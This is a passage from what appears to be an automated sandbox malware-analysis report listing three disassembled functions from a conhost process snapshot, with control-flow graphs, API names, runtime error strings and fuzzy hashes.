                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                        • API String ID: 544645111-395989641
                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                        Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                        • API String ID: 383729395-3474627141
                                        • Opcode ID: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                        • Instruction ID: c63db515c4fb09d3b511a87353661d5ddb22af0fe9f44d3f7c4a04084b72718c
                                        • Opcode Fuzzy Hash: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                        • Instruction Fuzzy Hash: 40F0F671A04A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C300
                                        Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
                                        • API String ID: 682475483-0
                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300